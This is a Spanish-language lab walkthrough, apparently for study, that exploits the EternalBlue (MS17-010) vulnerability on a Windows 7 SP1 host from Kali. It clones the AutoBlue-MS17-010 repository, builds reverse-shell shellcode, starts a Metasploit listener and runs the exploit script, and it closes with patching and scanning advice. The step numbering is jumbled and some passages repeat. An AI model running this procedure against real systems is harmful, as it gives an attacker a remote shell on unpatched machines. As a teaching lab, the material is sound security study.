MS17-010 EternalBlue
MS17-010 EternalBlue
MS17-010 EternalBlue
W7 MS17-010
PASO 1.-
Para iniciar el ataque de la vulnerabilidad MS17-010 de Windows7 Ultimate SP1 de 32-64 bits se
debe copiar o clonar el siguiente repositorio: https://github.com/3ndG4me/AutoBlue-MS17-010.git
PASO 2.-
2.- LHOST = la dirección IP del atacante en este caso, el del Kali que se está usando.
En este caso el puerto donde se hará el ataque es a un Windows de 64 bits que tiene el puerto 445
abierto, se procede a poner ese mismo puerto mencionado.
En este caso se puso el puerto 446, debido que el 445 se hará en el W7 de x64 y no se deben
repetir los puertos que se harán los ataques, sino, se generar un error en el procedimiento del
Shellcode al comento de compilar.
5.- Escribe 0 para generar una Shell meterpreter o 1 para generar una Shell regular de cmd
6.- Escribe 0 para generar cargas útiles por etapas (staged payload) o 1 para generar cargas útiles
sin etapa (stageless payload)
Luego el compilador hace el binario necesario para hacer los parámetros del metasploit para
32(x86) bits y 64(x64) bits
.
PASO 4.-
Una vez obtenido el archivo binario nos movemos a la carpeta principal AutoBlue-MS17-010 con el
comando “cd ..”, se copia el archivo de la carpeta shellcode el archivo especifico “sc_all.bin” a la
carpeta AutoBlue-MS17-010 con el comando “mv shellcode/sc_all.bin ../AutoBlue-MS17-010” luego
vemos que se copió con éxito el archivo en la carpeta principal de AutoBlue-MS17-010 con el
comando “ls”
PASO 5.-
De allí se debe configurar la escucha para capturar la sesión de shellcode en donde se compilará
las instrucciones y se activa el PostgreSQL
Luego abrimos el Enternal Blue Metasploit Listener con el comando “./listener_prep.sh” y se debe
seguir las siguiendo indicaciones:
1.- LHOST = la dirección IP del atacante en este caso, el del Kali que se está usando.
En este caso el puerto donde se hará el ataque es a un Windows de 64 bits que tiene el puerto 445
abierto, se procede a poner ese mismo puerto mencionado.
En este caso se puso el puerto 446, debido que el 445 se hará en el W7 de x64 y no se deben
repetir los puertos que se harán los ataques, sino, se generar un error en el procedimiento del
Shellcode al comento de compilar.
4.- Escribe 0 para generar una Shell meterpreter o 1 para generar una Shell regular de cmd
5.- Escribe 0 para generar cargas útiles por etapas (staged payload) o 1 para generar cargas útiles
sin etapa (stageless payload)
Este paso es parecido al “PASO 3” pero con excepción de que ya no configuras PAYLOAD en
msfvenom solo lo la ip_victima, los puertos por lo que estará escuchando y cmd o mertepreter que
se va usar, stageless o staged payload.
Una vez activado el PostgreSQL se inicia el metaspoit framework console y se autoconfigura el
PAYLOAD con un Shell_reverse_tcp que hemos escrito antes en los archivos binarios haciendo
ataques a sistema de 64 y 32 bits a la vez mediante el puerto 445 y 446, en este caso, a
Windows7.
PASO 6.-
Una vez estando en manejador(handler) ejecutado por el listerner,se abre un nueva venta shell
para ir a la carpeta de autoblue-ms17-010 y se inicia el ataque poniendo el comando de “phyton3
eternalblue_exploit7.py 192.168.0.x sc_all.bin” el cual hace un target identificando que es un
Windows 7 Service Pack 1y que ha sido ejecutado el exploit.
Ahora vemos como en la otra ventana de Shell, el listener capturo la sesión de Shell cmd de la
ip_victima en este caso al 192.168.0.12 y con el comando “sessions 1” se ingresa al cmd remoto
del Windows 7
Recomendación. –
Existen algunas actualizaciones para parchear o arreglar este tipo de vulnerabilidades en Windows
7 que se pueden obtener de internet y configurando bien los puertos de los sistemas operativos
que tengan ese tipo de vulnerabilidad a través de un escaneo de Nessus que sirve como
herramienta de detección de vulnerabilidades y Nmap con sus scripts de vulnerabilidades.